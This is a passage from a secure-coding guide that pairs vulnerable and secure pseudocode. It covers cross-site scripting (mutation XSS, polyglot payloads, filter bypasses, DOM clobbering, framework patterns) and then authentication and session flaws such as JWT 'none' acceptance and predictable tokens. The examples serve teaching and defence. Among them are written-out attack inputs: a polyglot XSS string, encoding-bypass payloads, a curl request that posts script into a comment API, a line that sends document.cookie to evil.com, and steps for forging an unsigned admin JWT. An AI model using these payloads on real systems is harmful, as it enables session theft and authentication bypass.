" + +// SECURE: Use textContent for text nodes +function setElementText(element, text): + element.textContent = text // Never interprets HTML + +// SECURE: Build DOM programmatically +function createListItem(text, isHighlighted): + li = document.createElement("li") + li.textContent = text // Safe text assignment + + if isHighlighted: + li.classList.add("highlighted") // Safe class manipulation + + return li + +// SECURE: Use template elements for complex HTML +function createCardFromTemplate(name, description): + template = document.getElementById("card-template") + card = template.content.cloneNode(true) + + // Set text content safely + card.querySelector(".card-name").textContent = name + card.querySelector(".card-desc").textContent = description + + return card + +// SECURE: Use DocumentFragment for batch operations +function renderList(items): + fragment = document.createDocumentFragment() + + for item in items: + li = document.createElement("li") + li.textContent = item.name // Safe + fragment.appendChild(li) + + document.getElementById("list").appendChild(fragment) + +// SECURE: Sanitize when HTML is genuinely needed +function renderRichContent(htmlContent): + // Use DOMPurify or similar trusted sanitizer + sanitized = DOMPurify.sanitize(htmlContent, { + ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"], + ALLOWED_ATTR: ["href"], + ALLOW_DATA_ATTR: false + }) + element.innerHTML = sanitized +``` + +**Why This Is Secure:** +- `textContent` never interprets HTML or scripts +- `createElement` + `textContent` is inherently safe +- Templates allow complex HTML without injection risk +- DOMPurify provides sanitization when HTML is required + +--- + +## Edge Cases Section + +### Edge Case 1: Mutation XSS (mXSS) + +```pseudocode +// DANGEROUS: Browser mutations can bypass sanitization + +// How mXSS works: +// 1. Sanitizer processes malformed HTML +// 2. Browser "fixes" the HTML during parsing +// 3. Fixed HTML contains executable content + +// Example: Backtick mutation +inputHtml = "" +// Some sanitizers don't escape backticks +// Browser may convert backticks to quotes in certain contexts + +// Example: Namespace confusion +inputHtml = "" +// SVG/MathML namespaces have different parsing rules +// Sanitizer might miss the nested script + +// Example: Table element mutations +inputHtml = "
" +// Browser moves
outside during parsing +// Can result in unexpected DOM structure + +// SECURE: Use battle-tested sanitizer with mXSS protection +function sanitizeHtml(html): + return DOMPurify.sanitize(html, { + // DOMPurify has mXSS protection built-in + USE_PROFILES: {html: true}, + // Optionally restrict further + FORBID_TAGS: ["style", "math", "svg"], + FORBID_ATTR: ["style"] + }) + +// BETTER: Avoid HTML sanitization when possible +function renderUserContent(content): + // If you only need formatted text, use markdown + markdownHtml = markdownToHtml(content) // Controlled conversion + return DOMPurify.sanitize(markdownHtml) +``` + +**Detection:** Test with: +- Malformed nesting (`
`) +- Namespace elements (``, ``, ``) +- Backticks and other unusual quote characters +- Processing instruction-like content (``) + +--- + +### Edge Case 2: Polyglot Payloads + +```pseudocode +// DANGEROUS: Payloads that work in multiple contexts + +// Polyglot XSS example: +payload = "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//\\x3csVg/" + +// This payload attempts to work in: +// - JavaScript context (javascript: URL) +// - HTML attribute context (onclick) +// - Inside HTML comments +// - Inside style/title/textarea/script tags +// - SVG context + +// Why this matters: +// - Single payload tests multiple vectors +// - Fuzzy input handling might trigger in unexpected context +// - Copy-paste from "safe" context to unsafe context + +// SECURE: Context-specific encoding, not generic filtering +function outputToContext(value, context): + switch context: + case "html_body": + return htmlEncode(value) + case "html_attribute": + return attributeEncode(value) + case "javascript_string": + return jsStringEncode(value) + case "url_parameter": + return urlEncode(value) + case "css_value": + return cssEncode(value) + default: + throw Error("Unknown context: " + context) + +// Each encoder handles that specific context's dangerous characters +``` + +**Detection:** Use polyglot payloads in security testing to find context confusion vulnerabilities. + +--- + +### Edge Case 3: Encoding Bypass Techniques + +```pseudocode +// DANGEROUS: Incomplete encoding can be bypassed + +// Bypass 1: Case variation +// Filter checks: if "alert(1)" +// Browser: case-insensitive HTML parsing + +// Bypass 2: HTML entities in event handlers +// Filter: remove "javascript:" +// Input: "javascript:alert(1)" +// Browser decodes entities before processing + +// Bypass 3: Null bytes +// Input: "java\x00script:alert(1)" +// Some filters/WAFs don't handle null bytes +// Some browsers ignore them + +// Bypass 4: Overlong UTF-8 +// Normal '<': 0x3C +// Overlong: 0xC0 0xBC (invalid UTF-8, but some parsers accept) + +// Bypass 5: Mixed encoding +// Input: "%3Cscript%3Ealert(1)%3C/script%3E" +// If HTML-encoded before URL-decoded, double encoding attack + +// SECURE: Encode on output, not filter on input +function secureOutput(userInput, context): + // Don't try to filter/blocklist dangerous patterns + // DO encode appropriately for the output context + + // The encoding makes ALL user input safe + // regardless of what it contains + return encode(userInput, context) + +// SECURE: Canonicalize THEN validate +function processInput(input): + // 1. Decode all encoding layers + decoded = fullyDecode(input) // URL, HTML entities, etc. + + // 2. Normalize (lowercase, normalize unicode) + normalized = normalize(decoded) + + // 3. Validate against rules + if not isValid(normalized): + reject() + + // 4. Store normalized form + store(normalized) + + // 5. Encode on output (later) +``` + +**Key Insight:** Output encoding is more reliable than input filtering because you know the exact output context. + +--- + +### Edge Case 4: DOM Clobbering + +```pseudocode +// DANGEROUS: HTML elements can override JavaScript globals + +// How DOM clobbering works: +// Elements with id or name attributes create global variables +html = '' +// Now: window.alert === element +// alert(1) throws error instead of showing alert + +// Exploitable clobbering: +html = '' +// document.cookie might now reference the input element + +// Attack on sanitizer output: +html = '' +// If code does: location = document.getElementById(cid) +// Attacker controls the navigation + +// More dangerous patterns: +html = '
' +// x.y now references the input +// Chains allow deep property access + +// SECURE: Avoid global lookups for security-sensitive operations +function getConfigValue(key): + // DON'T: return window[key] + // DON'T: return document.getElementById(key).value + + // DO: Use a namespaced config object + return APP_CONFIG[key] + +// SECURE: Use unique prefixes for security-critical IDs +function getElementById(id): + // Prefix with app-specific namespace + return document.getElementById("app__" + id) + +// SECURE: Validate types after DOM queries +function getFormElement(id): + element = document.getElementById(id) + if element instanceof HTMLFormElement: + return element + throw Error("Expected form element") +``` + +**Detection:** Test with: +- Elements with IDs matching JavaScript globals (`alert`, `name`, `location`) +- Elements with names matching object properties (`cookie`, `domain`) +- Nested forms with chained name/id attributes + +--- + +## Common Mistakes Section + +### Mistake 1: Encoding Once, Using in Multiple Contexts + +```pseudocode +// DANGEROUS: Single encoding for multiple contexts + +function saveUserProfile(name, bio): + // Encoding once at input time + safeName = htmlEncode(name) + safeBio = htmlEncode(bio) + + database.save({name: safeName, bio: safeBio}) + +function displayProfile(user): + // HTML context - HTML encoding was correct + htmlOutput = "

" + user.name + "

" // OK + + // But JavaScript context needs different encoding! + jsOutput = "" + // If name contained single quotes: "O'Brien" -> already encoded as "O'Brien" + // Now in JS context, ' is literal text, not a quote escape + + // And URL context is wrong too! + urlOutput = "/profile?name=" + user.name + // HTML entities in URL don't encode properly + +// SECURE: Store raw data, encode on output +function saveUserProfile(name, bio): + // Store raw (unencoded) user input + database.save({name: name, bio: bio}) + +function displayProfile(user): + // Encode specifically for each output context + htmlName = htmlEncode(user.name) + jsName = jsStringEncode(user.name) + urlName = urlEncode(user.name) + + htmlOutput = "

" + htmlName + "

" + jsOutput = "" + urlOutput = "/profile?name=" + urlName +``` + +**Rule:** Store data raw. Encode at the point of output, specific to that context. + +--- + +### Mistake 2: Client-Side Only Sanitization + +```pseudocode +// DANGEROUS: Relying only on client-side protection + +// Client-side sanitization +function submitComment(comment): + // Sanitize before sending to server + cleanComment = DOMPurify.sanitize(comment) + fetch("/api/comments", { + method: "POST", + body: JSON.stringify({comment: cleanComment}) + }) + +// Problem: Attacker bypasses client-side code entirely +// Using curl, Postman, or modified browser +curlCommand = """ +curl -X POST https://site.com/api/comments \\ + -H "Content-Type: application/json" \\ + -d '{"comment": ""}' +""" + +// Server trusts the input because "client sanitized it" +function handleCommentApi(request): + comment = request.body.comment + database.saveComment(comment) // Stored XSS! + +// SECURE: Server-side sanitization is mandatory +function handleCommentApiSecure(request): + comment = request.body.comment + + // Server-side sanitization + cleanComment = serverSideSanitize(comment) + + database.saveComment(cleanComment) + +function displayComment(comment): + // Still encode on output (defense in depth) + return htmlEncode(comment) + +// NOTE: Client-side sanitization can still be useful for: +// - Preview functionality +// - Reducing server load +// - Better UX feedback +// But it must NEVER be the only protection +``` + +**Rule:** Server-side encoding/sanitization is mandatory. Client-side is optional enhancement. + +--- + +### Mistake 3: Blocklist Approaches + +```pseudocode +// DANGEROUS: Trying to block known-bad patterns + +function filterXss(input): + // Block list approach + dangerous = [ + "", + "javascript:", + "onerror", "onload", "onclick", + "alert", "eval", "document.cookie" + ] + + result = input + for pattern in dangerous: + result = result.replace(pattern, "") + + return result + +// Bypasses: +// 1. Case: "" +// 2. Encoding: "<script>alert(1)</script>" +// 3. Null bytes: "alert(1)" +// 4. Other events: "onmouseover", "onfocus", "onanimationend" +// 5. Other sinks: "fetch('http://evil.com/'+document.cookie)" +// 6. New features: Future HTML/JS features not in blocklist + +// DANGEROUS: Regex blocklist +function filterXssRegex(input): + // Still bypassable + if regex.match(/.*?<\/script>/i, input): + return "" + return input + +// Bypass: "ipt>alert(1)ipt>" +// After removal: "" + +// SECURE: Allowlist approach +function sanitizeUsername(input): + // Only allow expected characters + if regex.match(/^[a-zA-Z0-9_-]{1,30}$/, input): + return input + throw ValidationError("Invalid username") + +// SECURE: Proper encoding (makes blocklist unnecessary) +function displaySafely(input): + return htmlEncode(input) // All input is safe after encoding +``` + +**Rule:** Allowlist what's expected, or encode everything. Never blocklist dangerous patterns. + +--- + +### Mistake 4: Trusting Sanitization Libraries Blindly + +```pseudocode +// DANGEROUS: Assuming sanitization handles everything + +function processHtml(userHtml): + // "The library handles XSS" + clean = sanitizer.sanitize(userHtml) + + // But then using it unsafely: + // 1. Wrong context + return "" + // Sanitizer cleaned HTML context, not JavaScript context + + // 2. Double encoding + clean = sanitizer.sanitize(htmlEncode(userHtml)) + // Now clean contains encoded entities that might decode later + + // 3. Post-processing that reintroduces vulnerabilities + processed = clean.replace("[link]", "
link") + // Custom processing after sanitization can break safety + +// SECURE: Understand what the sanitizer does +function processHtmlSecure(userHtml): + // 1. Sanitize for HTML context + cleanHtml = DOMPurify.sanitize(userHtml, { + ALLOWED_TAGS: ["p", "b", "i", "a"], + ALLOWED_ATTR: ["href"] + }) + + // 2. Validate URLs in allowed href attributes + dom = parseHtml(cleanHtml) + for link in dom.querySelectorAll("a[href]"): + if not isValidUrl(link.href): + link.removeAttribute("href") + + // 3. Use only in HTML context + return cleanHtml + +// SECURE: For JavaScript context, don't use HTML sanitizer +function embedDataInJs(data): + // JSON encoding is the appropriate "sanitizer" for JSON/JS + return JSON.stringify(data) // Handles all escaping for JSON +``` + +**Rule:** Use the right encoding/sanitization for each context. Sanitizers are context-specific. + +--- + +## Framework-Specific Guidance (Pseudocode Patterns) + +### React Pattern + +```pseudocode +// React default: Auto-escaping in JSX +function UserProfile(props): + // SAFE: React escapes by default + return ( +
+

{props.username}

// Auto-escaped +

{props.bio}

// Auto-escaped +
+ ) + +// DANGEROUS: dangerouslySetInnerHTML bypasses protection +function RichContent(props): + // VULNERABLE if props.html is user-controlled + return
+ +// SECURE: Sanitize before using dangerouslySetInnerHTML +function RichContentSafe(props): + sanitizedHtml = DOMPurify.sanitize(props.html) + return
+ +// DANGEROUS: href with user input +function UserLink(props): + // VULNERABLE: javascript: URLs execute + return {props.text} + +// SECURE: Validate URL scheme +function UserLinkSafe(props): + url = props.url + if not url.startsWith("http://") and not url.startsWith("https://"): + url = "#" // Safe fallback + return {props.text} +``` + +--- + +### Vue Pattern + +```pseudocode +// Vue default: Auto-escaping with {{ }} + + +// DANGEROUS: v-html bypasses protection + + +// SECURE: Sanitize before v-html + + + +// DANGEROUS: Dynamic attribute binding + + +// SECURE: URL validation + +``` + +--- + +### Angular Pattern + +```pseudocode +// Angular default: Auto-sanitization +@Component({ + template: ` + +

{{ username }}

+

{{ bio }}

+ ` +}) + +// Angular [innerHTML] is semi-safe (Angular sanitizes) +@Component({ + template: ` + +
+ ` +}) + +// DANGEROUS: Bypassing sanitization +import { DomSanitizer } from '@angular/platform-browser' + +@Component({...}) +class MyComponent { + constructor(private sanitizer: DomSanitizer) {} + + // VULNERABLE: Bypasses Angular's sanitization + get unsafeHtml() { + return this.sanitizer.bypassSecurityTrustHtml(this.userInput) + } +} + +// SECURE: Let Angular sanitize, or use additional sanitizer +@Component({...}) +class MyComponentSafe { + get safeHtml() { + // Angular's default sanitization is usually sufficient + // For extra safety, pre-sanitize + return DOMPurify.sanitize(this.userInput) + } +} +``` + +--- + +### Server-Side Template Engines Pattern + +```pseudocode +// Jinja2 (Python) +// SAFE: Auto-escaping by default +

{{ username }}

+ +// DANGEROUS: |safe filter +
{{ user_html | safe }}
+ +// Handlebars +// SAFE: {{ }} escapes +

{{username}}

+ +// DANGEROUS: {{{ }}} triple braces +
{{{user_html}}}
+ +// EJS (Node.js) +// SAFE: <%= %> escapes +

<%= username %>

+ +// DANGEROUS: <%- %> raw +
<%- user_html %>
+ +// SECURE PATTERN: Always use escaping syntax, sanitize if HTML needed +// Jinja2 +
{{ user_html | sanitize }}
+ +// Handlebars +
{{sanitize user_html}}
+ +// EJS +
<%= sanitize(user_html) %>
+``` + +--- + +## Security Checklist + +- [ ] All user input rendered in HTML is HTML-encoded +- [ ] All user input in HTML attributes is attribute-encoded and quoted +- [ ] All user input in JavaScript strings is JavaScript-encoded +- [ ] All user input in URLs is URL-encoded (and scheme validated for links) +- [ ] All user input in CSS is CSS-encoded or allowlist-validated +- [ ] `innerHTML`, `document.write`, and similar are avoided or use sanitized input +- [ ] `textContent` is used instead of `innerHTML` where possible +- [ ] `dangerouslySetInnerHTML`, `v-html`, `|safe` etc. only used with sanitized content +- [ ] URL schemes are validated (allow only http/https, not javascript:) +- [ ] Server-side encoding/sanitization is implemented (not just client-side) +- [ ] Encoding is performed at output time, specific to each context +- [ ] HTML sanitizer (DOMPurify) is used when rich HTML input is required +- [ ] Content Security Policy (CSP) headers are implemented +- [ ] X-XSS-Protection and X-Content-Type-Options headers are set +- [ ] Cookie HttpOnly flag is set to prevent JavaScript access +- [ ] No user input reaches eval(), new Function(), or setTimeout with strings +- [ ] Framework auto-escaping is enabled and not bypassed + +--- + +# Pattern 4: Authentication and Session Security + +**CWE References:** CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-613 (Insufficient Session Expiration), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-308 (Use of Single-factor Authentication), CWE-640 (Weak Password Recovery Mechanism), CWE-1275 (Sensitive Cookie with Improper SameSite Attribute) + +**Priority Score:** 22 (Frequency: 8, Severity: 9, Detectability: 5) + +--- + +## Introduction: High Complexity Leads to High AI Error Rate + +Authentication and session management represent one of the most complex security domains in application development. AI models struggle particularly with these patterns for several interconnected reasons: + +**Why AI Models Generate Insecure Authentication Code:** + +1. **Complexity Breeds Shortcuts:** Authentication requires coordinating multiple components—password storage, session management, token generation, cookie handling, and logout procedures. AI models often generate "working" code that skips essential security layers for simplicity. + +2. **Tutorial Syndrome:** Training data is saturated with simplified authentication tutorials designed to teach concepts, not build production systems. These tutorials often omit rate limiting, secure token generation, proper session invalidation, and timing attack prevention. + +3. **JWT Misunderstandings:** JSON Web Tokens have become the default recommendation, but AI models frequently generate JWT implementations with critical flaws—the "none" algorithm vulnerability, weak secrets, improper validation, and insecure storage. + +4. **Framework Diversity:** Authentication patterns vary dramatically across frameworks (Passport.js, Spring Security, Django, Rails Devise, etc.). AI models conflate patterns between frameworks, generating hybrid code that's neither correct for any framework nor secure. + +5. **Stateless vs. Stateful Confusion:** The shift toward stateless authentication (JWTs) has created mixed patterns in training data. AI often combines stateless token concepts with stateful session assumptions, creating logical gaps in security. + +6. **Edge Case Blindness:** Authentication edge cases—concurrent sessions, password reset flows, account recovery, MFA, and OAuth state management—require deep security thinking that AI models cannot reliably produce. + +**Impact Statistics:** + +- **75.8%** of developers believe AI-generated authentication code is secure (Snyk State of AI Security Survey 2024) +- **63%** of data breaches involve weak, default, or stolen credentials (Verizon DBIR 2024) +- Authentication bypasses represent **41%** of critical vulnerabilities in web applications (HackerOne Report) +- Average cost of a credential-stuffing breach: **$4.3 million** (Ponemon Institute) +- Only **23%** of AI-generated authentication code properly implements session invalidation on logout + +--- + +## BAD Examples: Multiple Manifestations + +### BAD Example 1: Weak Password Validation + +```pseudocode +// VULNERABLE: Minimal password requirements +function validatePassword(password): + if length(password) < 6: + return false + return true + +// VULNERABLE: Only checks length, no complexity +function registerUser(email, password): + if length(password) >= 8: // "Strong enough" + hashedPassword = hashPassword(password) + createUser(email, hashedPassword) + return success + return error("Password too short") + +// VULNERABLE: Pattern allows easy-to-guess passwords +function isValidPassword(password): + // Only requires one of each - easily satisfied by "Password1!" + hasUpper = containsUppercase(password) + hasLower = containsLowercase(password) + hasNumber = containsNumber(password) + hasSpecial = containsSpecialChar(password) + + if hasUpper and hasLower and hasNumber and hasSpecial: + return true + return false + // Missing: dictionary check, common password check, breach check +``` + +**Why This Is Dangerous:** +- Allows passwords like "123456", "password", or "qwerty123" +- No protection against common password lists +- No check against known breached passwords (Have I Been Pwned) +- Pattern requirements are easily satisfied by predictable passwords ("Password1!") +- Attackers can crack weak passwords in seconds with modern hardware + +--- + +### BAD Example 2: Predictable Session Tokens + +```pseudocode +// VULNERABLE: Sequential session IDs +sessionCounter = 1000 + +function generateSessionId(): + sessionCounter = sessionCounter + 1 + return "session_" + toString(sessionCounter) + +// VULNERABLE: Time-based session generation +function createSessionToken(): + timestamp = getCurrentTimestamp() + return "sess_" + toString(timestamp) + +// VULNERABLE: Weak random source +function generateToken(): + return "token_" + toString(randomInteger(0, 999999)) + +// VULNERABLE: MD5 of predictable data +function createAuthToken(userId): + timestamp = getCurrentTimestamp() + return md5(toString(userId) + toString(timestamp)) + +// VULNERABLE: User-controlled seed +function generateSessionId(userId, email): + seed = userId + email + getCurrentDate() + return sha256(seed) // Deterministic - same inputs = same output +``` + +**Why This Is Dangerous:** +- Sequential IDs allow session enumeration—attacker can guess valid sessions +- Timestamp-based tokens can be predicted if attacker knows approximate creation time +- Weak random (Math.random, random.randint) is predictable with statistical analysis +- MD5 is fast to compute, enabling brute-force attacks +- User-controlled inputs in token generation allow attackers to predict tokens + +--- + +### BAD Example 3: Session Fixation Vulnerabilities + +```pseudocode +// VULNERABLE: Session ID not regenerated after login +function login(request): + email = request.body.email + password = request.body.password + + user = findUserByEmail(email) + if user and verifyPassword(password, user.hashedPassword): + // Using the SAME session ID from before authentication + request.session.userId = user.id + request.session.authenticated = true + return redirect("/dashboard") + return error("Invalid credentials") + +// VULNERABLE: Accepting session ID from URL parameter +function handleRequest(request): + sessionId = request.query.sessionId or request.cookies.sessionId + // Attacker can send victim: https://app.com/login?sessionId=attacker_controlled_session + session = loadSession(sessionId) + +// VULNERABLE: Not invalidating session on privilege change +function promoteToAdmin(request): + user = getCurrentUser(request) + user.role = "admin" + user.save() + // Same session continues - if session was compromised before, + // attacker now has admin access + return success("You are now an admin") +``` + +**Why This Is Dangerous:** +- Attacker sets session ID → victim logs in → attacker uses same session ID with victim's authenticated session +- URL-based session IDs can be logged in server logs, browser history, referrer headers +- Privilege escalation without session regeneration means compromised sessions gain elevated access + +--- + +### BAD Example 4: JWT "none" Algorithm Acceptance + +```pseudocode +// VULNERABLE: Decoding JWT without algorithm verification +function verifyJwt(token): + parts = token.split(".") + header = base64Decode(parts[0]) + payload = base64Decode(parts[1]) + + // Trusting the algorithm from the token header itself! + algorithm = header.alg + + if algorithm == "none": + return payload // No signature check! + + signature = parts[2] + if verifySignature(payload, signature, algorithm): + return payload + return null + +// VULNERABLE: Using jwt library without specifying expected algorithm +function validateToken(token): + try: + // Library may accept 'none' algorithm if token specifies it + decoded = jwt.decode(token, secretKey) + return decoded + catch: + return null + +// VULNERABLE: Allowing multiple algorithms including none +function verifyToken(token, secret): + options = { + algorithms: ["HS256", "HS384", "HS512", "none"] // DANGEROUS + } + return jwt.verify(token, secret, options) +``` + +**Why This Is Dangerous:** +- Attacker modifies JWT header to specify `alg: "none"` and removes signature +- Server accepts unsigned token as valid +- This vulnerability has affected major JWT libraries across multiple languages +- Complete authentication bypass—attacker can impersonate any user + +**Exploit Example:** +```pseudocode +// Original legitimate token: +// Header: {"alg":"HS256","typ":"JWT"} +// Payload: {"sub":"1234","role":"user"} +// Signature: valid_signature_here + +// Attacker-modified token: +// Header: {"alg":"none","typ":"JWT"} ← Changed to "none" +// Payload: {"sub":"1234","role":"admin"} ← Changed to admin +// Signature: (empty) ← Removed + +// If server trusts header.alg, this forged token is accepted as valid +``` + +--- + +### BAD Example 5: Weak JWT Secrets + +```pseudocode +// VULNERABLE: Short/guessable secret +JWT_SECRET = "secret" + +// VULNERABLE: Common secrets from tutorials +JWT_SECRET = "your-256-bit-secret" +JWT_SECRET = "supersecretkey" +JWT_SECRET = "jwt-secret-key" + +// VULNERABLE: Empty or null secret +function createToken(payload): + secret = getConfig("JWT_SECRET") or "" // Falls back to empty string + return jwt.sign(payload, secret, {algorithm: "HS256"}) + +// VULNERABLE: Secret derived from predictable data +function getJwtSecret(): + return sha256(APPLICATION_NAME + "-" + ENVIRONMENT) + // If attacker knows app name and environment, they can derive the secret + +// VULNERABLE: Same secret for signing and encryption +JWT_SECRET = "shared_secret_for_everything" +function signToken(payload): + return jwt.sign(payload, JWT_SECRET) +function encryptData(data): + return aesEncrypt(data, JWT_SECRET) // Key reuse vulnerability +``` + +**Why This Is Dangerous:** +- Weak secrets can be brute-forced or found in wordlists +- Common tutorial secrets are in public databases of JWT secrets +- Empty secrets may be accepted by some JWT libraries +- Secret compromise allows forging any JWT—complete authentication bypass +- Key reuse across different cryptographic operations violates security principles + +--- + +### BAD Example 6: Token Storage in localStorage + +```pseudocode +// VULNERABLE: Storing JWT in localStorage +function handleLoginResponse(response): + accessToken = response.data.accessToken + refreshToken = response.data.refreshToken + + // localStorage is accessible to ANY JavaScript on the page + localStorage.setItem("access_token", accessToken) + localStorage.setItem("refresh_token", refreshToken) + + // Also stored user data in localStorage + localStorage.setItem("user", JSON.stringify(response.data.user)) + +// VULNERABLE: Retrieving token for API calls +function apiRequest(endpoint, data): + token = localStorage.getItem("access_token") + return fetch(endpoint, { + headers: { + "Authorization": "Bearer " + token + }, + body: JSON.stringify(data) + }) + +// VULNERABLE: Token in sessionStorage (same problem) +function storeToken(token): + sessionStorage.setItem("jwt", token) +``` + +**Why This Is Dangerous:** +- localStorage is accessible to any JavaScript running on the page +- XSS vulnerability = complete authentication compromise +- Tokens persist across browser sessions (localStorage) +- No protection against browser extensions reading storage +- Refresh tokens in localStorage allow long-term account takeover + +--- + +### BAD Example 7: Missing Token Expiration + +```pseudocode +// VULNERABLE: JWT without expiration +function createUserToken(user): + payload = { + userId: user.id, + email: user.email, + role: user.role + // No "exp" claim! + } + return jwt.sign(payload, JWT_SECRET) + +// VULNERABLE: Extremely long expiration +function generateToken(user): + payload = { + sub: user.id, + iat: now(), + exp: now() + (365 * 24 * 60 * 60) // 1 year expiration + } + return jwt.sign(payload, JWT_SECRET) + +// VULNERABLE: Trusting token-provided expiration without server check +function validateToken(token): + decoded = jwt.verify(token, JWT_SECRET) + // JWT library checks exp, but server has no session to revoke + // Compromised tokens valid until natural expiration + return decoded + +// VULNERABLE: No mechanism to invalidate tokens +function logout(request): + response.clearCookie("token") + return success("Logged out") + // Token is still valid! Anyone with the token can still use it +``` + +**Why This Is Dangerous:** +- Tokens without expiration are valid forever if secret isn't changed +- Long-lived tokens give attackers extended exploitation windows +- No server-side invalidation means compromised tokens can't be revoked +- Logout only removes token from client but doesn't invalidate it +- Stolen tokens remain valid even after password change + +--- + +## GOOD Examples: Secure Authentication Patterns + +### GOOD Example 1: Strong Password Requirements Pattern + +```pseudocode +// SECURE: Comprehensive password validation +import commonPasswordList from "common-passwords-database" +import breachedPasswordApi from "haveibeenpwned-api" + +function validatePasswordStrength(password): + errors = [] + + // Minimum length (NIST recommends 8+, many orgs use 12+) + if length(password) < 12: + errors.push("Password must be at least 12 characters") + + // Maximum length (prevent DoS from hashing extremely long passwords) + if length(password) > 128: + errors.push("Password cannot exceed 128 characters") + + // Check against common password list (10,000+ passwords) + if password.toLowerCase() in commonPasswordList: + errors.push("This password is too common") + + // Check against user-specific data (optional but recommended) + // - Don't allow email prefix as password + // - Don't allow username as password + + // Check against breached passwords (Have I Been Pwned API) + if await checkBreachedPassword(password): + errors.push("This password has appeared in a data breach") + + if length(errors) > 0: + return { valid: false, errors: errors } + + return { valid: true, errors: [] } + +// SECURE: Check breached passwords using k-anonymity (no password exposure) +async function checkBreachedPassword(password): + // Hash password with SHA-1 (HIBP API requirement) + hash = sha1(password).toUpperCase() + prefix = hash.substring(0, 5) + suffix = hash.substring(5) + + // Only send first 5 characters - k-anonymity preserves privacy + response = await fetch("https://api.pwnedpasswords.com/range/" + prefix) + hashes = response.text() + + // Check if our suffix appears in the returned hashes + for line in hashes.split("\n"): + parts = line.split(":") + if parts[0] == suffix: + return true // Password has been breached + + return false + +// SECURE: Password hashing with proper algorithm +function hashPassword(password): + // bcrypt with cost factor of 12 (adjust based on hardware) + // Alternatively: argon2id with recommended parameters + return bcrypt.hash(password, 12) + +function verifyPassword(password, hash): + return bcrypt.compare(password, hash) +``` + +**Why This Is Secure:** +- Length requirements block trivially short passwords +- Common password checking blocks dictionary attacks +- Breach checking prevents credential stuffing from known breaches +- k-anonymity ensures password isn't exposed during breach check +- bcrypt/argon2 provides proper password hashing with work factor + +--- + +### GOOD Example 2: Secure Session Generation + +```pseudocode +// SECURE: Cryptographically random session IDs +import cryptoRandom from "secure-random-library" + +function generateSessionId(): + // 256 bits of cryptographically secure randomness + // Represented as 64 hex characters + randomBytes = cryptoRandom.getRandomBytes(32) + return bytesToHex(randomBytes) + +// SECURE: Session creation with proper attributes +function createSession(userId): + sessionId = generateSessionId() + + sessionData = { + id: sessionId, + userId: userId, + createdAt: now(), + expiresAt: now() + SESSION_DURATION, // e.g., 24 hours + lastActivityAt: now(), + ipAddress: getClientIP(), + userAgent: getUserAgent() + } + + // Store in server-side session store (Redis, database, etc.) + sessionStore.save(sessionId, sessionData) + + return sessionId + +// SECURE: Session ID regeneration after authentication +function login(request): + email = request.body.email + password = request.body.password + + user = findUserByEmail(email) + if not user: + return error("Invalid credentials") // Don't reveal if email exists + + if not verifyPassword(password, user.hashedPassword): + recordFailedLogin(user.id, getClientIP()) + return error("Invalid credentials") + + // CRITICAL: Destroy old session and create new one + if request.session.id: + sessionStore.delete(request.session.id) + + // Generate completely new session ID after authentication + newSessionId = createSession(user.id) + + // Set session cookie with secure attributes + response.setCookie("session_id", newSessionId, { + httpOnly: true, // Prevent XSS access + secure: true, // HTTPS only + sameSite: "Strict", // CSRF protection + path: "/", + maxAge: SESSION_DURATION + }) + + return redirect("/dashboard") + +// SECURE: Session regeneration on privilege change +function changeUserRole(request, newRole): + user = getCurrentUser(request) + + // Change the role + user.role = newRole + user.save() + + // Regenerate session to bind new privileges to fresh session + oldSessionId = request.cookies.session_id + sessionStore.delete(oldSessionId) + + newSessionId = createSession(user.id) + + response.setCookie("session_id", newSessionId, { + httpOnly: true, + secure: true, + sameSite: "Strict" + }) + + return success("Role updated") +``` + +**Why This Is Secure:** +- Cryptographically random session IDs prevent prediction/enumeration +- Session regeneration after login prevents session fixation +- Privilege changes trigger session regeneration +- Secure cookie attributes prevent common attack vectors +- Server-side session storage allows proper invalidation + +--- + +### GOOD Example 3: Proper JWT Validation + +```pseudocode +// SECURE: JWT configuration with strict settings +JWT_CONFIG = { + secret: getEnv("JWT_SECRET"), // 256+ bit secret from environment + algorithms: ["HS256"], // Single allowed algorithm - explicit! + issuer: "myapp.example.com", + audience: "myapp-users", + expiresIn: "15m" // Short-lived access tokens +} + +// SECURE: Token creation with explicit claims +function createAccessToken(user): + payload = { + sub: toString(user.id), + email: user.email, + role: user.role, + iss: JWT_CONFIG.issuer, + aud: JWT_CONFIG.audience, + iat: now(), + exp: now() + (15 * 60), // 15 minutes + jti: generateUUID() // Unique token ID for revocation + } + + return jwt.sign(payload, JWT_CONFIG.secret, { + algorithm: "HS256" // Explicit algorithm + }) + +// SECURE: Token verification with all claims checked +function verifyAccessToken(token): + try: + decoded = jwt.verify(token, JWT_CONFIG.secret, { + algorithms: ["HS256"], // ONLY accept HS256 + issuer: JWT_CONFIG.issuer, + audience: JWT_CONFIG.audience, + complete: true // Return header + payload + }) + + // Additional validation + if not decoded.payload.sub: + return { valid: false, error: "Missing subject" } + + if not decoded.payload.role: + return { valid: false, error: "Missing role" } + + // Check against token blacklist (for logout/revocation) + if await isTokenRevoked(decoded.payload.jti): + return { valid: false, error: "Token revoked" } + + return { valid: true, payload: decoded.payload } + + catch JwtExpiredError: + return { valid: false, error: "Token expired" } + catch JwtInvalidError as e: + return { valid: false, error: "Invalid token: " + e.message } + +// SECURE: Refresh token handling +function createRefreshToken(user, sessionId): + payload = { + sub: toString(user.id), + sid: sessionId, // Bind to session for revocation + type: "refresh", + iat: now(), + exp: now() + (7 * 24 * 60 * 60) // 7 days + } + + token = jwt.sign(payload, JWT_CONFIG.secret + "_refresh", { + algorithm: "HS256" + }) + + // Store refresh token hash in database for revocation + tokenHash = sha256(token) + storeRefreshToken(user.id, sessionId, tokenHash, payload.exp) + + return token + +// SECURE: Refresh flow with rotation +function refreshAccessToken(refreshToken): + try: + decoded = jwt.verify(refreshToken, JWT_CONFIG.secret + "_refresh", { + algorithms: ["HS256"] + }) + + // Verify refresh token is still valid in database + tokenHash = sha256(refreshToken) + storedToken = getRefreshToken(decoded.sub, tokenHash) + + if not storedToken or storedToken.revoked: + return { error: "Refresh token invalid or revoked" } + + // Rotate refresh token (issue new one, revoke old) + revokeRefreshToken(tokenHash) + + user = findUserById(decoded.sub) + newAccessToken = createAccessToken(user) + newRefreshToken = createRefreshToken(user, decoded.sid) + + return { + accessToken: newAccessToken, + refreshToken: newRefreshToken + } + + catch: + return { error: "Invalid refresh token" } +``` 